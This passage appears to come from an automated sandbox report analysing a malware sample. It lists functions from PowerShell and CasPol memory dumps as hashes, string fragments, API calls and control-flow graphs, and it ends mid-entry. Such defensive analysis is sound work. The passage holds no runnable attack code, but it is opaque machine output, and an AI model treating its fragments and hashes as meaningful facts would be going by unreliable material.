                                        • Instruction ID: 0d05935aa7afc358bd3741466ed3576a0d85270a7284e359bcba6a28d4600c85
                                        • Opcode Fuzzy Hash: fe902ef9d650f77e3def6b4a7c1ad2f6a40047b7bb42aba4743dfb461c5f04b6
                                        • Instruction Fuzzy Hash: 5B412BB1F042599FD7308A6888547AABFA2EFD6710F18846AD44ADF391CA71DC41C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B72E0 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 84el$XRp$XRp$tPp$$p
                                        • API String ID: 0-3900736224
                                        • Opcode ID: 2bc8221063e944242472f748160e270e6eb7be00bf6f09e356aa8777b0fbab6c
                                        • Instruction ID: 595a9fc698dcf5f9f96f93dd60b815da0c6743e47aadee4be618ec2cd2b53e80
                                        • Opcode Fuzzy Hash: 2bc8221063e944242472f748160e270e6eb7be00bf6f09e356aa8777b0fbab6c
                                        • Instruction Fuzzy Hash: 33419FB1A00305DFDB348E15C545AE9BBE2AFD9315FA980ABD805EB350C771ED44CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B2128 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $p$$p$$p$]l$]l
                                        • API String ID: 0-1521549697
                                        • Opcode ID: 737b2fa3f8124d1c38344a95545e06154b08d82becba10769e84948434cc5b60
                                        • Instruction ID: 12fd205e41b615be8b3645f41b6ac8e8546aa2d59b9f467e1f45c6fb5b5cef2d
                                        • Opcode Fuzzy Hash: 737b2fa3f8124d1c38344a95545e06154b08d82becba10769e84948434cc5b60
                                        • Instruction Fuzzy Hash: 53112EB530430697E734592ECC047ABBB9AFBE1721F24802BE659C7394CA71E841C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B5B68 Relevance: 5.5, Strings: 4, Instructions: 489COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (op$(op$(op$(op
                                        • API String ID: 0-4040569024
                                        • Opcode ID: 74d851f3947bb79e81d7ad68f9fa9efe42d5a61e1505f3c2abe5f80d9391958d
                                        • Instruction ID: 6bfd02e3eb5f9b4e1350bbca310c4f4bf49956099ceab6bcc5a86bdeedd19d74
                                        • Opcode Fuzzy Hash: 74d851f3947bb79e81d7ad68f9fa9efe42d5a61e1505f3c2abe5f80d9391958d
                                        • Instruction Fuzzy Hash: D9F114B170430ADFDB319F68C844BEABBA2EF91310F18846AE515CB392DB71D851CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B80A6 Relevance: 5.4, Strings: 4, Instructions: 359COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'p$4'p$x.Xk$-Xk
                                        • API String ID: 0-2799299216
                                        • Opcode ID: d102627fc1859e93238452311d31b1c6aed8807caaf08b96497391e3f66970fd
                                        • Instruction ID: e1a4c4dbe78cf692a40ee3109ed87f1a7224b61bf6824d0ffb081144e1d668b3
                                        • Opcode Fuzzy Hash: d102627fc1859e93238452311d31b1c6aed8807caaf08b96497391e3f66970fd
                                        • Instruction Fuzzy Hash: F2F17D74A01214DFE724DB58C854F9ABBB2FB88304F1485E9D509AB391CB75ED82CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B3748 Relevance: 5.3, Strings: 4, Instructions: 268COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 84el$84el$tPp$tPp
                                        • API String ID: 0-630840201
                                        • Opcode ID: c6ce41ad113cf07938e6c22839732baccc46753f9270e41c6aa8c22b40feb791
                                        • Instruction ID: 38ef757807289022124460d277e1db66b9ada0d438c7fafeacab551ccbd1ecb0
                                        • Opcode Fuzzy Hash: c6ce41ad113cf07938e6c22839732baccc46753f9270e41c6aa8c22b40feb791
                                        • Instruction Fuzzy Hash: 9B9147B17042059FC7348E78C811BAEBBE2EFD6310F28856AE445DB7A1CA71D841CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B92F8 Relevance: 5.3, Strings: 4, Instructions: 251COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 84el$84el$tPp$tPp
                                        • API String ID: 0-630840201
                                        • Opcode ID: e4648042be3a5c8c9996548f504dea626ac47d7f1a3dae6054bdc37d9f4e853a
                                        • Instruction ID: ad4f79e8c826870f256985152f76df9d909f5fb146302371db719df797a00fcc
                                        • Opcode Fuzzy Hash: e4648042be3a5c8c9996548f504dea626ac47d7f1a3dae6054bdc37d9f4e853a
                                        • Instruction Fuzzy Hash: EA81E371704215CFDB24DF68C4406AABBE2EFD9324F18C46AD949DB391CA71EC41CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B6964 Relevance: 5.1, Strings: 4, Instructions: 144COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'p$84el$tPp$$p
                                        • API String ID: 0-59205659
                                        • Opcode ID: d2e39cb9139d78e4c18e6bfa9e158e75590e5e26c37efe1ac9eac175321edbfb
                                        • Instruction ID: 2cfa8455965e7a150e9dc1ac5f8780977f795670bfde0e29e08675d93f4fc2f8
                                        • Opcode Fuzzy Hash: d2e39cb9139d78e4c18e6bfa9e158e75590e5e26c37efe1ac9eac175321edbfb
                                        • Instruction Fuzzy Hash: EB51F3B1700206DBDF348E15C551BEAB7A2BF95315F58C4AAE805DB390EB71EC81CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B0828 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $p$$p$$p$$p
                                        • API String ID: 0-3121760203
                                        • Opcode ID: 42228b4d86e20433c7ccd829b6f84d266afaab4fcb3b013e8345bd2929f3cf1c
                                        • Instruction ID: bf2b9f977c1ecff8f109a69e211ed6d6ae101d15ea71717373e0dfdfbd9415df
                                        • Opcode Fuzzy Hash: 42228b4d86e20433c7ccd829b6f84d266afaab4fcb3b013e8345bd2929f3cf1c
                                        • Instruction Fuzzy Hash: E32168B13003169BEB345D7A9C017BB7B86EFE5751F24443AD409CB392EEB6C94187A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B4F0D Relevance: 5.1, Strings: 4, Instructions: 82COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $p$$p$$p$$p
                                        • API String ID: 0-3121760203
                                        • Opcode ID: d4a56088ab47c5ac81d04b9a3560687525ba6d128029ef207260667692bf9622
                                        • Instruction ID: b62131dac9503ecc24a0f873e5dff4310abc402ca54dd191470acfb5953944b0
                                        • Opcode Fuzzy Hash: d4a56088ab47c5ac81d04b9a3560687525ba6d128029ef207260667692bf9622
                                        • Instruction Fuzzy Hash: 8F212BB5504386DFCB308E14C5426FABBB0BFA5264F28416AD41CC7343E776E555CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 078B1339 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1952510481.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_78b0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'p$4'p$$p$$p
                                        • API String ID: 0-377911355
                                        • Opcode ID: 85ceb7d0c8f1713a4905c41a3a1b803ca611bfde2b65f838fc8fd05de9582d1b
                                        • Instruction ID: b0e773663338da87c5d2ba82b423d5ec790b73b766bf2dce236e69290c1c0862
                                        • Opcode Fuzzy Hash: 85ceb7d0c8f1713a4905c41a3a1b803ca611bfde2b65f838fc8fd05de9582d1b
                                        • Instruction Fuzzy Hash: 78012661B083464FC339462848383AA7B629FC2550F1D41AFC045DF7A6DE684C0283AA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:11.9%
                                        Dynamic/Decrypted Code Coverage:85.7%
                                        Signature Coverage:0%
                                        Total number of Nodes:21
                                        Total number of Limit Nodes:6
                                        execution_graph 25428 1150a25 25429 11509e5 25428->25429 25431 115084e 25428->25431 25430 115091b 25431->25430 25433 1151370 25431->25433 25435 1151373 25433->25435 25434 1151470 25434->25431 25435->25434 25437 1157080 25435->25437 25438 115708a 25437->25438 25439 11570a4 25438->25439 25442 2285d020 25438->25442 25446 2285d00f 25438->25446 25439->25435 25444 2285d035 25442->25444 25443 2285d24a 25443->25439 25444->25443 25445 2285d625 GlobalMemoryStatusEx 25444->25445 25445->25444 25447 2285d035 25446->25447 25448 2285d24a 25447->25448 25449 2285d625 GlobalMemoryStatusEx 25447->25449 25448->25439 25449->25447 25450 35eaa87 TerminateThread 25451 35ea5f3 25450->25451 25451->25450 25452 35b4526 25451->25452

                                        Executed Functions

                                        Function 01159BE2 Relevance: 2.8, Instructions: 2776COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 296096f1571706102a2187feecee008e0a3be9ef3bdcfddc31084b0c9a2a149b
                                        • Instruction ID: 3645a008f75b4b0b6634081c32f78dc2fd1dce58c36f64d7ae9dc45b50eb7d3e
                                        • Opcode Fuzzy Hash: 296096f1571706102a2187feecee008e0a3be9ef3bdcfddc31084b0c9a2a149b
                                        • Instruction Fuzzy Hash: 1853E631D10B1A8ADB11EF68C9846A9F7B1FF99300F51D79AE45877121EB70AAC4CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0115CEA0 Relevance: 2.4, Instructions: 2411COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1c00740b4fd795744a3238cba7eac78be981835b67a3a73bc2e118085d3c4d5
                                        • Instruction ID: 72f583608533317b6178710c87b725df684053fe73e10fba228d3a7ab7c24adf
                                        • Opcode Fuzzy Hash: f1c00740b4fd795744a3238cba7eac78be981835b67a3a73bc2e118085d3c4d5
                                        • Instruction Fuzzy Hash: 16332D31D1071ACEDB15DF68C8806ADF7B1FF99300F15C69AE458A7225EB70AAC5CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01154A88 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a2e924eca1166364ef346fa9fc7f5e4dfc57891230c0c0fe24720b592156a28
                                        • Instruction ID: 692a33574bd6ea152b726b96f074c3c9a676348f07f0b18a2b972ad824fad8bb
                                        • Opcode Fuzzy Hash: 2a2e924eca1166364ef346fa9fc7f5e4dfc57891230c0c0fe24720b592156a28
                                        • Instruction Fuzzy Hash: 03B16E70E00209CFDB58CFA9D8957EDBBF2AF88314F148129D825E7694FB749885CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01153E70 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f27cd23aed4ac7908facb1cfc461f4ef8c19490b9955c4987b0a26aaf14f0037
                                        • Instruction ID: 7f1573b3fe88d4ae90c3b33b158945ef8c9142dd8453fd6c7b938231a1f05bdf
                                        • Opcode Fuzzy Hash: f27cd23aed4ac7908facb1cfc461f4ef8c19490b9955c4987b0a26aaf14f0037
                                        • Instruction Fuzzy Hash: 4B919270E00209CFDF58CFA9D9847DDBBF2BF88314F148129E825A7294EB749885CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 035EAA87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1036 35eaa87-35eaaa8 TerminateThread 1037 35eaaae-35eaab6 1036->1037 1038 35ea5f3-35ea5f5 1036->1038 1040 35eaabc-35eaacc 1037->1040 1041 35b4526-35b4539 1037->1041 1039 35ea8c8 1038->1039 1043 35ea8cb-35ea8dd 1039->1043 1040->1038 1044 35eaad2-35eaada 1040->1044 1041->1041 1042 35b453b-35b4558 1041->1042 1048 35b455a-35b455e 1042->1048 1049 35b45d3-35b45da 1042->1049 1050 35ea8df 1043->1050 1044->1039 1045 35eaae0-35eaae5 1044->1045 1051 35b45d2 1048->1051 1052 35b4560-35b456c 1048->1052 1053 35b45b9-35b45d0 1049->1053 1054 35b45dc-35b45e5 1049->1054 1050->1036 1051->1049 1052->1053 1053->1051 1055 35b45eb-35b45f8 1054->1055 1056 35b45fa 1055->1056 1057 35b4668-35b466d 1055->1057 1059 35b45fc-35b461f 1056->1059 1060 35b4671-35b469b 1056->1060 1058 35b466f 1057->1058 1058->1060 1059->1055 1059->1057 1060->1058 1062 35b469d 1060->1062
                                        APIs
                                        • TerminateThread.KERNEL32(5BFFFFFB), ref: 035EAA8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753616995.00000000035AB000.00000040.00000400.00020000.00000000.sdmp, Offset: 035AB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_35ab000_CasPol.jbxd
                                        Similarity
                                        • API ID: TerminateThread
                                        • String ID: `_
                                        • API String ID: 1852365436-3757061437
                                        • Opcode ID: 70249d6cf8ae8e24a6e8ec04fb4305a8ba1b804df7666737bfefc752cbc4f06a
                                        • Instruction ID: 56cc4f152d455f666446707b01b655b5fe72c4afc052ed7a816b1ad5cb334ec4
                                        • Opcode Fuzzy Hash: 70249d6cf8ae8e24a6e8ec04fb4305a8ba1b804df7666737bfefc752cbc4f06a
                                        • Instruction Fuzzy Hash: 5C41AE3A548AC69FEB36CA35E8C57D1BB69FB42321758028ED1D0472F3DF264452CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01156EC7 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1883 1156ec7-1156f32 call 1156c30 1892 1156f34-1156f4d call 115635c 1883->1892 1893 1156f4e-1156f7c 1883->1893 1897 1156f7e-1156f81 1893->1897 1899 1156f95-1156f98 1897->1899 1900 1156f83-1156f8a 1897->1900 1903 1156fd4-1156fd7 1899->1903 1904 1156f9a-1156fcf 1899->1904 1901 1156f90 1900->1901 1902 11570db-11570e1 1900->1902 1901->1899 1905 1156fe7-1156fea 1903->1905 1906 1156fd9 call 11578fa 1903->1906 1904->1903 1907 115701d-115701f 1905->1907 1908 1156fec-1157000 1905->1908 1909 1156fdf-1156fe2 1906->1909 1910 1157026-1157029 1907->1910 1911 1157021 1907->1911 1914 1157006 1908->1914 1915 1157002-1157004 1908->1915 1909->1905 1910->1897 1912 115702f-115703e 1910->1912 1911->1910 1918 1157040-1157043 1912->1918 1919 1157068-115707d 1912->1919 1917 1157009-1157018 1914->1917 1915->1917 1917->1907 1922 115704b-1157066 1918->1922 1919->1902 1922->1918 1922->1919
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LRp$LRp
                                        • API String ID: 0-1719900535
                                        • Opcode ID: 22e6a8e52f23b99780511fb6786f6a0164e0f367f6e0a0f8f0c7513f3c9e36bb
                                        • Instruction ID: 4a4ecc71bfff4df6ee12d230d5c0e4ec95ba53d7e889bad13074011ca6941772
                                        • Opcode Fuzzy Hash: 22e6a8e52f23b99780511fb6786f6a0164e0f367f6e0a0f8f0c7513f3c9e36bb
                                        • Instruction Fuzzy Hash: 9451E430E00215CFDB59DF68C8557AEBBB2EF86300F60856AE815EB2D1DB759C42CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01156B70 Relevance: 2.6, Strings: 2, Instructions: 84COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1974 1156b70-1156bfb 1985 1156c17-1156c47 1974->1985 1986 1156bfd-1156c04 call 1156344 1974->1986 1993 1156c6c-1156c72 1985->1993 1994 1156c49-1156c61 1985->1994 1988 1156c09-1156c16 1986->1988 1994->1993
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LRp$lYP
                                        • API String ID: 0-233073917
                                        • Opcode ID: 6387c91692fc0a74c48942f191ecc7af31c825106b25cb5206260999aecd7cce
                                        • Instruction ID: 85d06569568ca0283fa0264736b9dc15c2e1b3df4324b18c9d563c4bd891727e
                                        • Opcode Fuzzy Hash: 6387c91692fc0a74c48942f191ecc7af31c825106b25cb5206260999aecd7cce
                                        • Instruction Fuzzy Hash: 3831D23130C3904FC716AB3C94602AE7FA2EF86214F1844EEC0C5CF297DE699848C39A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 011578FA Relevance: 1.8, Strings: 1, Instructions: 556COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: YP
                                        • API String ID: 0-3387386325
                                        • Opcode ID: d928eac4ec5f3239aefe7eb48d361c652bdc21778b24beab7ce4ed7254522956
                                        • Instruction ID: 5475f4888ec50fcb1cb6c518710d7d6301f67b7ee282bd16a491508665327e24
                                        • Opcode Fuzzy Hash: d928eac4ec5f3239aefe7eb48d361c652bdc21778b24beab7ce4ed7254522956
                                        • Instruction Fuzzy Hash: CC1253707047068BCB1AA73CD89466C37A2FB89314B608A3DE449DB375DF7ADC469B81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 2285E229 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2799673281.0000000022850000.00000040.00000800.00020000.00000000.sdmp, Offset: 22850000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_22850000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c2e0d1ca7dd3d0f554117c3a909aa2cfd04483634712d6416a995a6b7fc3fe2
                                        • Instruction ID: 7d6b3c25a1bf22717568ceb7accc08a5b828b9a9bea516e4b35359897d0a0301
                                        • Opcode Fuzzy Hash: 9c2e0d1ca7dd3d0f554117c3a909aa2cfd04483634712d6416a995a6b7fc3fe2
                                        • Instruction Fuzzy Hash: 11411372E083968FCB04CFB9C8502EEBFF1AF89310F1585AAD444A7251DB789845CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 2285E310 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(8B55227F), ref: 2285E377
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2799673281.0000000022850000.00000040.00000800.00020000.00000000.sdmp, Offset: 22850000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_22850000_CasPol.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 5be5382c4f29a653aa608fb3c73e677ae828b22bf2c0265079157dbd2a0b9780
                                        • Instruction ID: 32280d9602c99666c2ebbb1b83f26ed9d7d55666a6e355710b0fa218bb5519e5
                                        • Opcode Fuzzy Hash: 5be5382c4f29a653aa608fb3c73e677ae828b22bf2c0265079157dbd2a0b9780
                                        • Instruction Fuzzy Hash: 011103B1C006599FCB10CF9AC580ADEFBF4AF48310F15816AD818A7240D378A9558FA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0115F40D Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PHp
                                        • API String ID: 0-2495607638
                                        • Opcode ID: 655a98968fcdfff7c9b72459d1478dbb1cbb673562306abf5db8d14b5a4851da
                                        • Instruction ID: f6a4ac0dfb1196ced08c2256786c5c93f662f436e40fdd377da079cdcb1dc2da
                                        • Opcode Fuzzy Hash: 655a98968fcdfff7c9b72459d1478dbb1cbb673562306abf5db8d14b5a4851da
                                        • Instruction Fuzzy Hash: 9441DF30B00206CFDB599B38C56466E7FA3AB89200F248568E856DB396DF39DC42CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01151138 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,"P H"P ,"P
                                        • API String ID: 0-3155577697
                                        • Opcode ID: e2f3ce969886d1c9998e6efb34551eeba221c06529eebde5899fc69ee65548e7
                                        • Instruction ID: 9dda76fb51a75c0a0047ee5846f08ff8daa98c6796813e3eb0d22ce98f3d2d1a
                                        • Opcode Fuzzy Hash: e2f3ce969886d1c9998e6efb34551eeba221c06529eebde5899fc69ee65548e7
                                        • Instruction Fuzzy Hash: CB51ED306916468FC706DFBDE880E563BA2F79570930095A9D48CAB33BDE786E05CF85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01156F68 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LRp
                                        • API String ID: 0-3405495957
                                        • Opcode ID: 74969a1430843303e16e81c2407a9a1541a2aa4ca292a9513f44efac06b2bb18
                                        • Instruction ID: da2191d91bb750ee833b1b9f636694b9c669caef92d78d9725a5b8dd64b1da55
                                        • Opcode Fuzzy Hash: 74969a1430843303e16e81c2407a9a1541a2aa4ca292a9513f44efac06b2bb18
                                        • Instruction Fuzzy Hash: FD318334E00219CBDB59CFA9C8517AEB7B1EF85300FA0852AE815EB291EB759841CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 011516A0 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,"P H"P ,"P
                                        • API String ID: 0-3155577697
                                        • Opcode ID: d0625b589ed2d396cd576559e4aa26c67f36d9b1fd236ba867df76e99e1d0910
                                        • Instruction ID: 78c9c5635d2b47adb6418ec1732fcc878f86a513a517187314594f8b7ad8601d
                                        • Opcode Fuzzy Hash: d0625b589ed2d396cd576559e4aa26c67f36d9b1fd236ba867df76e99e1d0910
                                        • Instruction Fuzzy Hash: 8B218C306402059BDF67DB2CD888B2A3766EB84718F104969D41ACB6A6EF68DD808F95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 011596D0 Relevance: .4, Instructions: 361COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68a827507d2d904e1d13a877f41d5bfd594a534cd552aee04f5dbf40f13cafdb
                                        • Instruction ID: 8dc9098c6beb678567b59745cc7305a2c4bcb144e7336eee3da9f11961187f3b
                                        • Opcode Fuzzy Hash: 68a827507d2d904e1d13a877f41d5bfd594a534cd552aee04f5dbf40f13cafdb
                                        • Instruction Fuzzy Hash: 1CD1A171A00209CFDB58CF6CD5807AEBBB6FB84314F14816AD919DB395DB74D841CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01159354 Relevance: .4, Instructions: 352COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.2753211940.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_1150000_CasPol.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54bd70ac75f90181b180a34480618d1481764a45f313d518b2af4b9a7e067e32
                                        • Instruction ID: fd16cbd806a1d207acadaba767201d8f0379a1d31507f0dfcf2015a76f077aef
